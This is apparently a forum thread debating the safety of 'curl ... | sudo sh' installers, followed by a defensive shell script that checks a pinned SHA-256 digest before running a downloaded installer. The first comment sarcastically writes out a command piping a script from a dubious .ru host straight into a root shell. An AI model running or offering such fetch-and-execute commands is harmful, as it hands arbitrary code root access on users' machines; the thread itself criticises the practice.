You must run curl http://totallylegitwebsite.ru/install | sudo sh, it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.
I hate this model, but if you trust the website, piping to shell is exactly as safe as downloading and executing an installer. (Yeah yeah, https, function executed on last line, etc)
I don’t want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.
Code signing was created for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.
Using brew in Linux is a bit better
100%. I’m just saying that on Windows and Mac, the inferior “download an installer” model is still prevalent, and that |sh is as safe as that.
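The "authentic and unaltered" check discussed in this thread, as an added example that is not part of any comment above: instead of `curl ... | sh`, the script is saved to a file, compared against a SHA-256 digest obtained separately, and executed only on a match. This is a digest pin rather than code signing, and `sha256_of`, `verify_then_run`, `demo` and the sample installer are names and data constructed for illustration.

```shell
#!/bin/sh
# Added example: save to a file, verify a pinned SHA-256, then execute.
# All function names, paths and the sample installer are constructed.

# Print the SHA-256 hex digest of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_then_run FILE EXPECTED_SHA256 [ARGS...]
# Runs FILE with sh only if its digest matches; otherwise returns 1 without executing.
verify_then_run() {
    file=$1; expected=$2; shift 2
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    actual=$(sha256_of "$file") || return 1
    if [ "$actual" != "$expected" ]; then
        echo "digest mismatch for $file: got $actual" >&2
        return 1
    fi
    sh "$file" "$@"
}

# Offline demo: a constructed "installer" stands in for the downloaded file
# (in real use: curl -fsSLo "$file" "$url", with the digest from another channel).
demo() {
    dir=$(mktemp -d) || return 1
    printf 'echo installed > "$1"\n' > "$dir/install.sh"
    pinned=$(sha256_of "$dir/install.sh")   # stands in for the published digest

    good=1; verify_then_run "$dir/install.sh" "$pinned" "$dir/ok.marker" && good=0

    # Simulate the script changing after the digest was pinned.
    printf 'echo tampered > "$1"\n' >> "$dir/install.sh"
    bad=0; verify_then_run "$dir/install.sh" "$pinned" "$dir/bad.marker" 2>/dev/null || bad=1

    # The first run executed and wrote its marker; the second never executed.
    result=1
    [ "$good" -eq 0 ] && [ -f "$dir/ok.marker" ] && \
        [ "$bad" -eq 1 ] && [ ! -f "$dir/bad.marker" ] && result=0
    rm -rf "$dir"
    return "$result"
}

demo && echo "verified script ran; altered script was refused"
```

The check is only as good as the channel the pinned digest came from: a digest published on the same page as the script protects against truncation and mirror tampering, not against a compromised site.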